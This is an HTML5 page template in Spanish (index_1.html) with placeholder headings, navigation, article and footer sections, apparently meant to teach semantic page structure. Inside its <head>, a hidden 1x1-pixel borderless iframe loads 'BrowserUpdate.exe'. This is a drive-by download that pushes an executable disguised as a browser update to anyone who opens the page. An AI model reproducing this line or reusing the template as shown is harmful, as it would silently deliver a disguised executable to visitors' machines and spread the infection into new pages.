index_1.html



<!DOCTYPE html>

<html lang="es">

<!-- NUEVA ESTRUCTURA SEMANTICA DE HTML5 -->
<head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
	<title>TITULO DE LA PAGINA </title>
	<meta charset="utf-8" />
	<meta description="DESCRIPCION DE LA PAGINA">
</head>

<body background=Fondo.jpg>
	<header>
		<h1>TITULO</h1>
		<figure>
			LOGOTIPO
			<figdescription>TITULO DE LA FIGURA</figdescription>
		</figure>
	</header>
	<nav>
		MEN&Uacute;
	</nav>
	<section>
		<hgroup>
			<h1>Encabezado secundario</h1>
			<h2>encabezado de tipo h2</h2>
			ETC
		</hgroup>
		<article>
			ART&Iacute;CULO
			<section>
				POSIBLEMENTE OTRA section
			</section>
		</article>
	</section>

	<footer>
		REFERENCIAS O RESUMEN DE PAGINA <<Copy Right>>
	</footer>
</body>

</html>